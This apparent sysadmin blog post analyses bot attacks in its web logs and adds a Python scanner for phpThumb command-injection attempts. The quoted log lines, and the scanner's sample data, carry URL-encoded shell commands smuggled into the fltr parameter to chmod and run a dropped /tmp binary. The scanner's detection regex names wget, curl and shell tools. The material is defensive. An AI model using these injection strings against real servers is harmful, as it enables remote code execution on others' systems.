Note: Updated 11/13/2016
A very interesting week in the wetware vs. botware wars. Patterns and common vulnerabilities are starting to come out of obscurity. New attack vectors have presented themselves. Indeed exciting times, LOL.
One of the most interesting, attack-wise, comes from France and Malaysia. It appears to be a CMS scan, but I don't believe it is. It may be one of the first denial of service reflection attacks. There are embedded bash shell commands in the query string that are directed at specific sites that aren't my IP. I've included two samples below:
220.127.116.11 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr=blur|9%20
hmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602
18.104.22.168 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr
/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168
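The two samples above follow one pattern: a request for phpThumb.php whose fltr parameter carries URL-encoded shell commands, plus a phpThumbDebug parameter. As an added example that is not part of the original post, the Python script below parses Apache combined-format access log lines, decodes the query string, and flags requests matching that pattern, so a defender can pull them out of a large log. The log lines in SAMPLE_LOG are constructed for the example (documentation-range IPs, modelled on the samples above); the log format regex and the list of shell indicators are assumptions. Note that phpThumb legitimately uses "|" to separate filter arguments (blur|9), so the pipe character is deliberately not treated as an indicator.

```python
"""Flag phpThumb-style command injection attempts in Apache access logs (added example)."""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache combined/common log format: ip ident user [timestamp] "METHOD target PROTO" status size
# (assumed format; adjust LOG_RE if your LogFormat differs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Things that have no business inside an image filter parameter:
# shell separators/substitution, a /tmp/ path, or common command names.
# "|" is excluded on purpose because phpThumb's own fltr syntax uses it.
SHELL_HINTS = re.compile(r'[;`$()]|/tmp/|\b(chmod|wget|curl|sh|bash|ps)\b')

# Constructed sample log lines: one injection attempt, one benign phpThumb
# request, one unrelated request. Not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/'
    'phpThumb.php?src=file.jpg&fltr=blur|9%20;chmod%200755%20/tmp/barbut6;/tmp/barbut6;'
    'ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602',
    '192.0.2.11 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/'
    'phpThumb/phpThumb.php?src=file.jpg&fltr=blur|5 HTTP/1.1" 200 14168',
    '192.0.2.12 - - [23/Dec/2011:03:00:00 -0700] "GET /index.php?q=search HTTP/1.1" 200 512',
]


def parse_query(query):
    """Split a raw query string on '&' only and percent-decode each side.

    Done by hand rather than with parse_qsl so that literal ';' inside a
    value (as in the injection payload) is kept, not treated as a separator.
    """
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    rec['params'] = parse_query(parts.query)
    return rec


def classify(rec):
    """Return the reasons a parsed request looks like a phpThumb injection attempt."""
    reasons = []
    if rec['path'].lower().endswith('/phpthumb.php'):
        if SHELL_HINTS.search(rec['params'].get('fltr', '')):
            reasons.append('shell metacharacters in fltr')
        if rec['params'].get('phpThumbDebug'):
            reasons.append('phpThumbDebug requested')
    return reasons


def scan(lines):
    """Return (ip, path, status, reasons) for every suspicious request in lines."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append((rec['ip'], rec['path'], rec['status'], reasons))
    return hits


if __name__ == '__main__':
    for ip, path, status, reasons in scan(SAMPLE_LOG):
        print(f'{ip} {status} {path}: {", ".join(reasons)}')
```

Feed a real log through scan() by replacing SAMPLE_LOG with the lines of the file. The status code is kept in the output because a 404 or 403 (as in the samples above) means the request was refused, whereas a 200 on a host that actually ships phpThumb is the case worth investigating.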
Don't waste your time, folks, I penetration test my own systems regularly for weaknesses, and proxy service is turned off. Drupal is also very well protected, BTW. Your rewards for going there are 403's and backtracking… So that's one of the new vectors.
The other interesting proposition was getting these from two countries going in opposite directions. Tracerouting to 22.214.171.124 actually terminates at 126.96.36.199, but now terminates at:
$ traceroute 188.8.131.52
18 ge-0-0-0.glsfb02.ipe.time.net.my (184.108.40.206)
When this was scanned with zenmap, observe where the traceroute terminates (see image).
It's one of the strangest maps I have had the displeasure to view. Again, this week was a virtual tour of the world, LOL! I contacted a hospital in China, because I don't want to be disabling hospital systems due to compromised security at their end.
- HTTP TRACE enabled.
- All or almost all mail ports open (POP, IMAP, etc.)
- Undefined ports open.
- Many mail servers with nothing but a control panel login.
- Most importantly: Almost 100% LINUX SYSTEMS. This is concerning because it means, IMHO, that the configuration has become too complex for most users to securely configure. The 'nix systems can be the most secure when open to the Internet, but if I'm finding this datum, that means that most compromised systems have been misconfigured, allowing bot intrusion.
I have the zenmaps, and redacted secure and httpd logs available for research purposes if anybody is interested. Just contact me at firstname.lastname@example.org.